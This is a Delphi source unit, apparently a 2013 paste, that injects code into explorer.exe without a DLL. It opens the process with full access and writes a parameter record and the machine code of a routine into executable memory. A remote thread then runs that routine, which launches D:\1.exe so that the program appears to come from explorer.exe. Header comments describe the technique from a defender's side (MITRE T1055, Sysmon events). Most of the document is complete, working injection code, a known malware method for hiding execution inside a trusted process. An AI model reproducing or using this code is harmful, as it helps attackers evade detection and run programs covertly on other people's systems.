appo

Inject without using DLL

Dec 27th, 2013
  //******************************************************************************
  //* UNIT:        UNT_InjectNoDLL
  //* AUTHOR:      Fakedo0r
  //*
  //* Summary of what this listing does:
  //*   1. Inyectora walks a Toolhelp32 process snapshot looking for
  //*      'explorer.exe' and opens that process with PROCESS_ALL_ACCESS.
  //*   2. AllocAndCopyMem is used twice to place a TINJECT record and the
  //*      machine code of Inyectada into the opened process.
  //*   3. CreateRemoteThread starts the copied routine there; the routine calls
  //*      ShellExecuteW with the verb 'open' on 'D:\1.exe'.
  //*
  //* Reviewer notes (defensive reading):
  //*   - The call sequence OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READWRITE)
  //*     -> WriteProcessMemory -> CreateRemoteThread is the remote-thread form of
  //*     process injection (MITRE ATT&CK T1055, Process Injection).
  //*   - Each step is observable: a cross-process handle opened with full access
  //*     (e.g. Sysmon event ID 10), a thread created in another process
  //*     (Sysmon event ID 8), and private executable+writable memory in the
  //*     target that is not backed by a module on disk.
  //*   - Because the launch is issued from inside explorer.exe, the started
  //*     program would normally be recorded with explorer.exe as its parent,
  //*     so parent/child lineage alone does not identify the real origin.
  //******************************************************************************
  Unit UNT_InjectNoDLL;
  //******************************************************************************
  // LIBRARY / CLASS DECLARATIONS
  //******************************************************************************
  Interface

  Uses
    Winapi.Windows, TLHelp32, PsAPI, ShellAPI;
  //******************************************************************************
  // STRUCTURE DECLARATIONS
  //******************************************************************************
  Type
    PTINJECT = ^TINJECT;

    // Parameter block that is copied into the target process and handed to the
    // remote thread as its single argument.
    TINJECT = Record
      // Address of ShellExecuteW. It is resolved in the injecting process (see
      // Inyectora) and then used inside the target process.
      // NOTE(review): this presumes Shell32.dll is mapped at the same address
      // in both processes - confirm; the listing does not verify it.
      __ShellExecute: Function(HWND: HWND; Operation, FileName, Parameters,
        Directory: PWideChar; ShowCmd: Integer): HINST; Stdcall;

      // File to launch (passed as the FileName argument).
      cExe: Array [0 .. MAX_PATH] Of Char;
      // Verb to use (passed as the Operation argument).
      cOper: Array [0 .. MAX_PATH] Of Char;
    End;
  //******************************************************************************
  // FUNCTION / PROCEDURE DECLARATIONS
  //******************************************************************************
  Procedure Inyectada(tInj: PTINJECT); Stdcall;
  Procedure Inyectora;
  Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
    iBuffSize: Int64): Pointer;
  //******************************************************************************
  Implementation
  //******************************************************************************
  //<--- THE FUNCTION THAT IS INJECTED --->
  //
  // Runs as the start routine of the remote thread. It touches nothing except
  // the record it is given: the call goes through the function pointer stored
  // in tInj, with tInj.cOper as the verb, tInj.cExe as the file, no parameters,
  // no working directory and ShowCmd = 1.
  //******************************************************************************
  Procedure Inyectada(tInj: PTINJECT); Stdcall;
  Begin
    tInj.__ShellExecute(0, tInj.cOper, tInj.cExe, Nil, Nil, 1);
  End;
  //******************************************************************************
  //<--- THE FUNCTION THAT PERFORMS THE INJECTION --->
  //
  // Takes no parameters and returns nothing; the target process name, the file
  // to launch and the verb are all hard-coded below. None of the API return
  // values other than the thread handle are checked.
  //******************************************************************************
  Procedure Inyectora;
  Var
    uTamFun:    UINT;
    dwPID:      DWORD;
    dwExitCode: DWORD;
    hThread:    THandle;
    hProcess:  THandle;
    ptStruct:  Pointer;
    ptEsp:      Pointer;
    tProcEntry: TProcessEntry32;
    tInj:      TINJECT;
  Begin
    uTamFun := 0;
    dwExitCode := 0;
    // hProcess temporarily holds the snapshot handle; it is reused for the
    // process handle further down.
    hProcess := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    tProcEntry.dwSize := Sizeof(tProcEntry);

    // Walk the snapshot and stop at the first entry named 'explorer.exe'.
    // NOTE(review): dwPID is assigned only inside this loop, so it is left
    // unassigned when no entry matches.
    If Process32First(hProcess, tProcEntry) Then
    Begin
      Repeat
        If tProcEntry.szExeFile = 'explorer.exe' Then
        Begin
          dwPID := tProcEntry.th32ProcessID;
          Break;
        End;
      Until Not Process32Next(hProcess, tProcEntry);
    End;

    CloseHandle(hProcess);

    // get the handle of the process (full access is requested)
    hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwPID);

    // get the pointer to the API (resolved in this process, not in the target)
    @tInj.__ShellExecute := GetProcAddress(LoadLibrary('Shell32.dll'),
      'ShellExecuteW');

    // copy the data into the record fields
    lstrcpy(tInj.cExe, PChar('D:\1.exe'));
    lstrcpy(tInj.cOper, PChar('open'));

    // allocate space for our record in the target and copy it there
    ptStruct := AllocAndCopyMem(hProcess, @tInj, Sizeof(TINJECT));

    // compute the size of our function as the distance between the addresses
    // of Inyectora and Inyectada
    // NOTE(review): this presumes the compiler emits Inyectora directly after
    // Inyectada - confirm; it is why the two procedures must stay in this
    // order.
    uTamFun := UINT(@Inyectora) - UINT(@Inyectada);

    // allocate space for our function in the target and copy it there
    ptEsp := AllocAndCopyMem(hProcess, @Inyectada, uTamFun);

    // create the remote thread: start address = copied code, argument = copied
    // record. PDWORD(Nil)^ passes a nil reference for the thread-id output.
    hThread := CreateRemoteThread(hProcess, Nil, 0, ptEsp, ptStruct, 0,
      PDWORD(Nil)^);

    If hThread <> 0 Then
    Begin
      // wait on the thread handle with no timeout (the handle is signalled when
      // the thread terminates)
      WaitForSingleObject(hThread, INFINITE);
      // get the thread's exit code (the value is not used afterwards)
      GetExitCodeThread(hThread, dwExitCode);
      // release the handle of the created thread
      CloseHandle(hThread);
      // free the memory in the target process; this happens only on this
      // branch, so both regions stay allocated when thread creation fails
      VirtualFreeEx(hProcess, ptStruct, 0, MEM_RELEASE);
      VirtualFreeEx(hProcess, ptEsp, 0, MEM_RELEASE);
    End;

    // release the process handle
    CloseHandle(hProcess);
  End;
  //******************************************************************************
  //<--- ALLOCATES SPACE AND WRITES TO MEMORY --->
  //
  // hProcess  : handle of the process to allocate in.
  // ptBuffer  : local buffer to copy from.
  // iBuffSize : number of bytes to allocate and copy.
  // Result    : address returned by VirtualAllocEx in the other process.
  //
  // The same helper is used for the data record and for the code, so both
  // regions are requested as PAGE_EXECUTE_READWRITE. Neither the allocation
  // result nor the outcome of WriteProcessMemory is checked, and iBytesWritten
  // is not compared with iBuffSize.
  //******************************************************************************
  Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
    iBuffSize: Int64): Pointer;
  Var
    iBytesWritten: SIZE_T;
  Begin
    iBytesWritten := 0;
    // allocate space
    Result := VirtualAllocEx(hProcess, Nil, iBuffSize, MEM_COMMIT Or MEM_RESERVE,
      PAGE_EXECUTE_READWRITE);
    // write
    WriteProcessMemory(hProcess, Result, ptBuffer, iBuffSize, iBytesWritten);
  End;
  End.